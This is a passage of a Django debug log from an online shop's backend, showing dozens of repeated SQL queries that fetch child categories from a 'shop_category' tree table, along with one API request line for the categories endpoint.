"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:22:27,195 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:22:27,198 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:22:27,201 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:22:27,204 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:22:27,206 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:22:27,208 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:22:27,210 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:22:27,213 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:22:27,216 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:22:27,218 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:22:27,220 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:22:27,223 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:22:27,225 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:22:27,228 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:22:27,230 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:22:27,233 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:22:27,235 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:22:27,237 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:22:27,240 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:22:27,243 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:22:27,245 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:22:27,247 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:22:27,249 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:22:27,251 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:22:27,254 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:22:27,256 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:22:27,259 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:22:27,261 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:22:27,264 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:22:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:22:32,726 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:22:32,733 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:22:32,737 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:22:32,739 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:22:32,743 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:22:32,745 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:22:32,748 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:22:32,750 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:22:32,753 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:22:32,756 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:22:32,758 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:22:32,761 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:22:32,763 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:22:32,766 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:22:32,770 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:22:32,772 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:22:32,774 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:22:32,776 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:22:32,778 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:22:32,782 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:22:32,784 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:22:32,786 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:22:32,788 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:22:32,791 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:22:32,793 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:22:32,798 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:22:32,800 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:22:32,802 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:22:32,804 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:22:32,807 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:22:32,810 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:22:32,812 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:22:32,814 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:22:32,816 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:22:32,819 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:22:32,822 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:22:32,825 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:22:32,827 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, 